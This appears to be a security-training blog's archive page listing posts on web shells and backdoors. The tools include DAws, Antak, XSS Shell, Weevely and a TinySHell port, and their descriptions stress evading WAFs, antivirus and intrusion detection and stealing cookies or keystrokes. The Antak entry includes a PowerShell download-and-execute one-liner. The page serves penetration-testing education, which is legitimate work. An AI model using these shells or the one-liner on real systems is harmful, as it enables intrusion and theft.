Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột

Chương trình Đào tạo Hacker Mũ Trắng Việt Nam tại Thành phố Buôn Ma Thuột kết hợp du lịch. Khi đi là newbie - Khi về là HACKER MŨ TRẮNG !

Hacking Và Penetration Test Với Metasploit

Chương trình huấn luyện sử dụng Metasploit Framework để Tấn Công Thử Nghiệm hay Hacking của Security365.

Tài Liệu Computer Forensic Của C50

Tài liệu học tập về Truy Tìm Chứng Cứ Số (CHFI) do Security365 biên soạn phục vụ cho công tác đào tạo tại C50.

Sinh Viên Với Hacking Và Bảo Mật Thông Tin

Cuộc thi sinh viên cới Hacking. Với các thử thách tấn công trang web dành cho sinh viên trên nền Hackademic Challenge.

Tấn Công Và Phòng Thủ Với BackTrack / Kali Linux

Khóa học tấn công và phòng thủ với bộ công cụ chuyên nghiệp của các Hacker là BackTrack và Kali LINUX dựa trên nội dung Offensive Security

Sayfalar

Showing posts with label Shell. Show all posts
Showing posts with label Shell. Show all posts

DAws - Advanced Web Shell (Windows/Linux)

1:17 PM  , , , , ,  


There's multiple things that makes DAws better than every Web Shell out there:
  1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell.
  2. Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR(Randomized key for every session) + Base64(We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there.
  3. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
  4. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example.
  5. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know.
  6. Supports Windows and Linux.
  7. Openned Source.

Extra Info
  • Eval Form:
    • `include` is being used instead PHP `eval` to bypass Protection Systems.
  • Download from Link - Methods:
    • PHP Curl
    • File_put_content
  • Zip - Methods:
    • Linux:
      • Zip
    • Windows:
      • Vbs Script
  • Shells and Tools:
    • Extra:
      • `nohup`, if installed, is automatically used for background processing.

Read More

Antak WebShell - A webshell which utilizes PowerShell

2:10 PM  , , , , , ,  


Antak is a webshell written in C#.Net which utilizes powershell. Antak is a part of Nishang and updates could be found here: https://github.com/samratashok/nishang

Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind while using commands (like changing current directory or running session aware scripts).

Executing PowerShell scripts on the target -
  1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
  2. Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
  3. By uploading the script to the target and executing it.
  4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:
  • Upload a file
  • Download a file
  • Executing Scripts
  • Remoting/Pivoting

Read More

PyHttpShell - Python HTTP Shell

4:23 PM  , , , , , ,  


PyHttpShell is a shell written in python, traffic is over http protocol using a server in the middle.

Video: https://vimeo.com/91085876


Features


  • Transport over HTTP/HTTPS.
  • Supports System Proxy Settings.
  • Multiple Hosts/Connections.
  • Download files to client machine.
  • Change Sleep time remotely.
  • Works on Win/MAC/Linux


Read More

[XSS Shell] XSS Backdoor and Zombie Manager

3:22 PM  , , , , , , , , , ,  



XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by “XSS-Proxy – http://xss-proxy.sourceforge.net/”. Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page.

Download

This package includes the latest version of XSS Shell and XSSTunnel. XSS Shell can be used without XSS Tunnel, however you’ll get more out of it with XSS Tunnel.
Download XSS Shell and XSS Tunnel

Features

XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.
Most of the features can enable or disabled from configuration or can be tweaked from source code.
  • Regenerating Pages
    • This is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keep user in virtual environment. Thus even user click any links in the infected page he or she will be still under control! (within cross-domain restrictions) In normal XSS attacks when user leaves the page you can’t do anything
    • Secondly this feature keeps the session open so even victim follow an outside link from infected page session is not going to timeout and you will be still in charge.
  • Keylogger
  • Mouse Logger (click points + current DOM)
  • Built-in Commands;
    • Get Keylogger Data
    • Get Current Page (Current rendered DOM / like screenshot)
    • Get Cookie
    • Execute supplied javaScript (eval)
    • Get Clipboard (IE only)
    • Get internal IP address (Firefox + JVM only)
    • Check victim’s visited URL history

Read More

[TinySHell] Ported to SCTP

5:34 PM  , , ,  


You may have seen, a while ago, my post on SCTP reverse shells.

I realized quite quickly that I should definately do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use a SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also is encrypted connection.

The backdoor in question is ‘TinySHell’ by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later.

Anyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it!


Read More

[Hidden CMD Detector] Discover Hidden Command prompts

2:34 PM  , , , ,  


Hidden CMD Detector is the free tool to discover Hidden Command prompts and detect any Hacker presence on your system.

The first thing any Hacker does on getting access to remote system is to run a hidden Command shell. This tool can help you to automatically detect any such hidden cmd prompts and keep your system safe from hackers.

It can help you to discover following type of command prompts,
  • Normal/Hidden Command Prompts
  • Renamed or custom Command Prompts
  • Reverse Command Shells launched by hacker Tools like netcat
  • Command Prompts launched by User/System Process

This tool can be easily automated to run at certain interval. It supports 3 output modes (normal, one liner, xml) making it easy to parse the result through the automation scripts.
It will be ideal tool to run on unattended machines periodically to detect any hacker activities and alert the administrators.

Read More

[ShellSave v1.0] Manten todas tus Shells ordenadas y en un sólo lugar

8:59 PM  , , ,  


La idea de crear la ShellSave surge de la propia necesidad de contener de forma ordenada nuestra lista de backdoors web y evitar agendarlos en archivos de texto lo cuál es poco comodo a la hora de realizar una busqueda.

La ShellSave se encarga de ordenarlos de una manera prolija, trabajando mano a mano con una db y obteniendo datos a travez de la url pasada, tales como: ip, nombre del host y geolocalizacion del mismo.


Otra de las carácteristicas que posee es la de incluir a travez de un iframe la webshell selecciónada, esto se podría aprovechar montando el script en un servidor web para luego usarlo de próxy tras realizar la petición a nuestro backdoor.


Como ven se trata de una herramienta super sencilla pero que a la vez resulta de gran utilidad tras la post explotación de uno o varios objetivos.

  • El proceso de instalación es simple.
  • Crear una base de datos e importar el archivo sql que se encuentra en el directorio bd
  • Editar el fichero config.php con los datos correspondientes
  • Loguearse dentro de la ShellSave con el password por defecto “test”
  • Agendar nuestras webshells.


Web oficial: http://underterminal.nixiweb.com

Read More

[Hackersh] Free shell (command interpreter) written in Python

6:52 AM  , , , , , ,  

Hackersh ("Hacker Shell") is a free and open source (license) shell (command interpreter) written in Python with Pythonect-like syntax, builtin security commands, and out of the box wrappers for various security tools. It is like Unix pipeline, but for processing security information and metadata rather than bytes.


Download Hackersh version 0.1
Web: http://www.hackersh.org/

Read More

[Weevely] PHP Stealth Tiny Web Shell

8:26 AM  , , , , , ,  


Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing.

  • More than 30 modules to automatize administration and post exploitation tasks:
    • Execute commands and browse remote filesystem, even with PHP security restriction
    • Audit common server misconfigurations
    • Run SQL console pivoting on target machine
    • Proxy your HTTP traffic through target
    • Mount target filesystem to local mount point
    • Simple file transfer from and to target
    • Spawn reverse and direct TCP shells
    • Bruteforce SQL accounts through target system
    • Run port scans from target machine
    • And so on..
  • Backdoor communications are hidden in HTTP Cookies
  • Communications are obfuscated to bypass NIDS signature detection
  • Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection
You can download Weevely v1.0 here:


Or read more here.

Read More
Subscribe to: Posts (Atom)